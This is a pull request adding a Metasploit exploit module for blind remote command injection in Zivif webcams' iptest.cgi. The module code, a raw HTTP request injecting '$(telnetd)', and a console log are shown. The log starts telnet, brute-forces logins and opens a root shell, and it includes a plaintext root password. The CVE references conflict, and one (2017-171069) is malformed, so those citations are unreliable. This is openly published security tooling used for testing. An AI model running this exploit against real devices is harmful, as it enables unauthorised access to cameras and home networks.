### PR TITLE
Added exploit for CVE-2017-17106

### DIFF
--- a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.rb
+++ b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.rb
@@ -1,0 +1,75 @@
+## Description
+
+
+  This module exploits a remote command execution vulnerability in Zivif webcams.  This is known to impact versions prior to and including v2.3.4.2103.  Exploit was reported in CVE-2017-17105.  
+
+  This module has been tested successfully on version v2.3.4.2103 and V4.7.4.2121.
+
+## Vulnerable Application
+
+  Unfortunately a virtual copy of this camera is not avaiable.  
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/http/zivif_ipcheck_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `set PAYLOAD payload/cmd/unix/generic`
+  5. Do: `set CMD telnetd`
+  6. Do: `exploit`
+  7. Port 23 will now be open on the target
+
+
+## Scenarios
+
+
+  ```
+  msf5 > use exploit/unix/http/zivif_ipcheck_exec
+  msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35
+  rhost => 192.168.0.35
+  msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic
+  PAYLOAD => cmd/unix/generic
+  msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd
+  CMD => telenetd
+  msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit 
+
+  [*] Sending request
+  [+] Command sent successfully
+  [*] Exploit completed, but no session was created.
+  msf5 exploit(unix/http/zivif_ipcheck_exec) > 
+  msf5 exploit(unix/http/zivif_ipcheck_exec) > back
+  msf5 > use auxiliary/scanner/telnet/telnet_login
+  msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24
+  RHOSTS => 192.168.0.0/24
+  msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds
+  USERPASS_FILE => /root/creds
+  msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
+  threads => 10
+  msf5 auxiliary(scanner/telnet/telnet_login) > exploit 
+
+  [!] 192.168.0.34:23          - No active DB -- Credential data will not be saved!
+  [+] 192.168.0.34:23          - 192.168.0.34:23 - Login Successful: root:cat1029
+  [*] 192.168.0.34:23          - Attempting to start session 192.168.0.34:23 with root:cat1029
+  [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.34:23) at 2020-06-15 19:47:14 +0000
+
+  [-] 192.168.0.34:23          - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: )
+  [*] 192.168.0.34:23          - Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/telnet/telnet_login) > 
+  msf5 auxiliary(scanner/telnet/telnet_login) > sessions 
+
+  Active sessions
+  ===============
+
+    Id  Name  Type   Information                         Connection
+    --  ----  ----   -----------                         ----------
+    1         shell  TELNET root:cat1029 (192.168.0.34:23)  0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34)
+
+  msf5 auxiliary(scanner/telnet/telnet_login) > 
+
+
+  ```
+
+
+

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'             => "Zivif Camera Web Interface Blind Remote Command Execution ",
+      'Name'             => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
       'Description'      => %q{
           This module exploits a remote command execution vulnerability in Zivif 
        webcams.  This is known to impact versions prior to and including v2.3.4.2103.

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'      => %q{
           This module exploits a remote command execution vulnerability in Zivif
        webcams.  This is known to impact versions prior to and including v2.3.4.2103.
-       Exploit was reported in CVE-2017-17106.
+       Exploit was reported in CVE-2017-17105.
       },
       'License'          => MSF_LICENSE,
       'Author'           => [ 'Silas Cutler (p1nk)' ],
@@ -37,8 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl'
+              'RequiredCmd' => 'generic'
             }
+        },
+      'DefaultOptions'  =>
+        { 
+          'PAYLOAD'           => 'cmd/unix/generic',
         },
       'Privileged'       => false,
       'DisclosureDate'   => "2017-09-01",

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
         },
       'Privileged'       => false,
-      'DisclosureDate'   => "1 September 2017",
+      'DisclosureDate'   => "2017-09-01",
       'DefaultTarget'    => 0))
   end
 

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
         },
       'DefaultOptions'  =>
-        { 
+        {
           'PAYLOAD'           => 'cmd/unix/generic',
         },
       'Privileged'       => false,

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'             => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
       'Description'      => %q{
-          This module exploits a remote command execution vulnerability in Zivif 
+          This module exploits a remote command execution vulnerability in Zivif
        webcams.  This is known to impact versions prior to and including v2.3.4.2103.
        Exploit was reported in CVE-2017-17106.
       },
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Automatic Target', { }]
         ],
       'Payload'        =>
-        { 
+        {
           'Space'       => 1024,
           'BadChars'    => "\x00\x27",
           'DisableNops' => true,
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_error('Connection failed')
       return Exploit::CheckCode::Unknown
     end
-    unless res.code && res.code == 200 
+    unless res.code && res.code == 200
       return CheckCode::Safe
     end
 
@@ -60,14 +60,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("Sending request")
-    cmd = datastore['CMD'] 
- 
+    cmd = datastore['CMD']
+
     res = send_request_cgi(
       'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
       'method' => 'GET',
       'vars_get' => {
         'cmd' => "iptest.cgi",
-        '-time' => "1504225666237",
+	'-time' => Time.now.to_i, 
         '-url' => "$(" + cmd + ")"
       }
     )

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'vars_get' => {
         'cmd' => "iptest.cgi",
-        '-time' => Time.now.to_i, 
+        '-time' => Time.now.to_i,
         '-url' => "$(" + cmd + ")"
       }
     )

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -52,12 +52,11 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_error('Connection failed')
       return Exploit::CheckCode::Unknown
     end
-    if res.code && res.code == 200 
-      return Exploit::CheckCode::Detected
-    else
-      return Exploit::CheckCode::Unknown
+    unless res.code && res.code == 200 
+      return CheckCode::Safe
     end
-    Exploit::CheckCode::Safe
+
+    CheckCode::Detected
   end
 
   def exploit

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'vars_get' => {
         'cmd' => "iptest.cgi",
-	'-time' => Time.now.to_i, 
+        '-time' => Time.now.to_i, 
         '-url' => "$(" + cmd + ")"
       }
     )

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -1,0 +1,88 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'             => "Zivif Camera Web Interface Blind Remote Command Execution ",
+      'Description'      => %q{
+          This module exploits a remote command execution vulnerability in Zivif 
+       webcams.  This is known to impact versions prior to and including v2.3.4.2103.
+       Exploit was reported in CVE-2017-17106.
+      },
+      'License'          => MSF_LICENSE,
+      'Author'           => [ 'Silas Cutler (p1nk)' ],
+      'References'       =>
+        [
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17106' ],
+          [ 'CVE', '2017-171069' ]
+        ],
+      'Platform'         => 'unix',
+      'Targets'          =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'Payload'        =>
+        { 
+          'Space'       => 1024,
+          'BadChars'    => "\x00\x27",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl'
+            }
+        },
+      'Privileged'       => false,
+      'DisclosureDate'   => "1 September 2017",
+      'DefaultTarget'    => 0))
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))
+    unless res
+      vprint_error('Connection failed')
+      return Exploit::CheckCode::Unknown
+    end
+    if res.code && res.code == 200 
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Sending request")
+    cmd = datastore['CMD'] 
+ 
+    res = send_request_cgi(
+      'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
+      'method' => 'GET',
+      'vars_get' => {
+        'cmd' => "iptest.cgi",
+        '-time' => "1504225666237",
+        '-url' => "$(" + cmd + ")"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code && res.code == 200
+      print_good('Command sent successfully')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unable to send command to target')
+    end
+  end
+
+end

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'           => [ 'Silas Cutler (p1nk)' ],
       'References'       =>
         [
-          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17106' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
           [ 'CVE', '2017-171069' ]
         ],
       'Platform'         => 'unix',


### PR DESCRIPTION
**Vulnerable Application**
Zivif is a brand of consumer IP cameras.  Version `2.3.4.2103` and prior are vulnerable to a remote command execution vulnerability - documented in `CVE-2017-171069` 

This module exploits the RCE vulnerability in the web interface of these IP cameras.  This is a blind RCE and the results of the command are not returned to the attacker. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/http/zivif_ipcheck_exec`
- [ ] `set RHOSTS <rhost>`
- [ ] `set PAYLOAD cmd/unix/generic`
- [ ] `set CMD <command>`
- [ ] `exploit`

In testing - for validation, the running `reboot` as the issued `<command>` is a good way to do a quick validation.  Alternatively, using `telnetd` will start Telnet on the vulnerable device.

An example HTTP request from this module is:
```
GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%24%28telnetd%29 HTTP/1.1
Host: <TARGET>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded

```


